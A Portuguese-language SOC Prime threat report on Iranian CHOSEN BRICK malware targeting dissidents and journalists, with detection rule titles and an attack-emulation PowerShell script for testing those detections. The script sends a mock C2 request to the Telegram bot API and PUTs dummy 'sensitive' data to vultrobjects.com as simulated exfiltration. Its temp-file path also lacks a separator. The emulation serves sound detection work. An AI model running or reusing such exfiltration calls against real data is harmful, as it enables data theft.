SOC Prime Bias: High

17 Sep 2026 08:26 UTC

Alvo cibernético iraniano em dissidentes, ativistas e jornalistas

Author Photo
SOC Prime Team linkedin icon Seguir
Alvo cibernético iraniano em dissidentes, ativistas e jornalistas
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Atores patrocinados pelo estado iraniano estão usando o malware CHOSEN BRICK para atingir dissidentes, ativistas e jornalistas em todo o mundo. O malware é entregue por meio de engenharia social em plataformas como WhatsApp e Telegram, muitas vezes disfarçado como aplicativos ou arquivos legítimos. Uma vez instalado, o CHOSEN BRICK suporta roubo de dados, gravação de microfone e eliminação do sistema por meio de comando e controle baseado no Telegram.

Investigação

A investigação identificou um padrão recorrente de engenharia social seguido pela implantação do CHOSEN BRICK em sistemas Windows. Os analistas observaram o malware usando bots do Telegram para comunicações C2 e serviços de armazenamento em nuvem para a exfiltração de dados. A persistência é estabelecida por meio de chaves específicas do registro Run, enquanto exclusões do Microsoft Defender são adicionadas para ajudar a evadir controles de segurança.

Mitigação

As mitigação recomendadas incluem melhorar a conscientização dos usuários sobre técnicas de engenharia social e evitar software entregue por meio de anexos não solicitados. As organizações também devem aplicar MFA resistente a phishing, implementar listas de permissão de aplicativos e manter o software antivírus atualizado. Monitorar conexões suspeitas ao Telegram e provedores de armazenamento em nuvem conhecidos pode fortalecer ainda mais a detecção.

Resposta

Se a atividade do CHOSEN BRICK for detectada, as organizações devem trabalhar com seus fornecedores de TI para revisar os logs de endpoints para as chaves de registro e caminhos de arquivo associados. Tanto os dispositivos corporativos quanto os pessoais usados por indivíduos de alto risco devem ser examinados. As equipes de segurança também devem procurar os domínios, nomes de arquivos e outros indicadores técnicos associados à campanha.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

Possíveis Pontos de Persistência [ASEPs – Software/NTUSER Hive] (via registry_event)

Equipe SOC Prime
16 Set 2026

Possível Abuso do Telegram Como Canal de Comando e Controle (via dns_query)

Equipe SOC Prime
16 Set 2026

Uso do CHOSEN BRICK do Telegram e VultrObjects para Comunicações Maliciosas [Conexão de Rede Windows]

Regras AI SOC Prime
16 Set 2026

Detecção de Persistência do CHOSEN BRICK via Chave Run do Registro [Evento do Registro do Windows]

Regras AI SOC Prime
16 Set 2026

Execução de Simulação

  • Narrativa & Comandos do Ataque: O adversário busca estabelecer comando e controle (C2) e exfiltrar dados sensíveis. Para evitar antivírus baseado em assinatura tradicional, utiliza serviços web legítimos. Primeiro, o atacante executa um comando para “check-in” com seu servidor C2 via API do Telegram (api.telegram.org). Em seguida, o atacante simula a exfiltração de um arquivo sensível ao enviá-lo para um bucket de armazenamento hospedado em vultrobjects.com. Essas ações são realizadas por meio de requisições web padrão para se misturar com o tráfego web criptografado legítimo, esperando passar despercebidas e só serem detectadas se IoCs específicos forem conhecidos.

  • Script de Teste de Regressão:

    # Script de Simulação: Emulação de TTPs do CHOSEN BRICK
    # Este script simula C2 via Telegram e Exfiltração via VultrObjects
    
    $C2_Domain = "api.telegram.org"
    $Exfil_Domain = "vultrobjects.com"
    
    Write-Host "[+] Iniciando Simulação: Emulando TTPs do CHOSEN BRICK..." -ForegroundColor Cyan
    
    # 1. Simular Check-in C2 (API Telegram)
    Write-Host "[*] Passo 1: Simulando check-in C2 para $C2_Domain" -ForegroundColor Yellow
    try {
        $c2_response = Invoke-WebRequest -Uri "https://$C2_Domain/bot123456:ABC-DEF/getUpdates" -Method Get -ErrorAction SilentlyContinue
        Write-Host "[+] Solicitação C2 enviada." -ForegroundColor Green
    } catch {
        Write-Host "[!] Nota: Conexão falhou (esperada se não houver internet/proxy), mas a telemetria ainda deve ser gerada." -ForegroundColor Gray
    }
    
    # 2. Simular Exfiltração de Dados (VultrObjects)
    Write-Host "[*] Passo 2: Simulando exfiltração de dados para $Exfil_Domain" -ForegroundColor Yellow
    $dummy_data = "Estas são informações altamente sensíveis sendo exfiltradas."
    $dummy_file = "$env:TEMPsensitive_data.txt"
    $dummy_data | Out-File -FilePath $dummy_file
    
    try {
        # Simulando uma requisição PUT para um endpoint de armazenamento em nuvem
        Invoke-RestMethod -Uri "https://$Exfil_Domain/exfil/data_dump.txt" -Method Put -Body $dummy_data -ContentType "text/plain" -ErrorAction SilentlyContinue
        Write-Host "[+] Solicitação de exfiltração enviada." -ForegroundColor Green
    } catch {
        Write-Host "[!] Nota: Conexão falhou (esperada se não houver internet/proxy), mas a telemetria ainda deve ser gerada." -ForegroundColor Gray
    }
    
    Write-Host "[+] Simulação completa. Verifique logs de proxy no SIEM envolvendo $C2_Domain e $Exfil_Domain." -ForegroundColor Cyan
  • Comandos de Limpeza:

    # Script de Limpeza
    $dummy_file = "$env:TEMPsensitive_data.txt"
    if (Test-Path $dummy_file) {
        Remove-Item -Path $dummy_file -Force
        Write-Host "[+] Limpeza: Arquivo de exfiltração simulado removido." -ForegroundColor Green
    } else {
        Write-Host "[!] Limpeza: Arquivo simulado não encontrado." -ForegroundColor Yellow
    }